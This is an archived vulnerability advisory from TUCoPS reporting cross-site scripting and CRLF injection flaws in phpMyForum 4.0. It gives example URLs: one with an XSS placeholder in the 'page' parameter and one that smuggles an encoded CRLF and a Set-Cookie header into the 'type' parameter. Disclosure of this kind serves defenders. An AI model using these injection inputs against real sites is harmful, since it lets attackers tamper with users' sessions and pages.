Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: b06-1531.htm

phpMyForum Cross Site Scripting & CRLF injection



phpMyForum Cross Site Scripting & CRLF injection
phpMyForum Cross Site Scripting & CRLF injection



Title : phpMyForum Cross Site Scripting & CRLF injection
Author: Mourad aka Psych0
Moroccan Security Team
Vendor: www.phpmyforum.de 
Version: 4.0

Examples:

http://target/path/index.php?page=[xsscode]&type=text%2Fcss 

http://target/path/index.php?template=css&type=some_url%0d%0aSet-Cookie%3Aheader 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH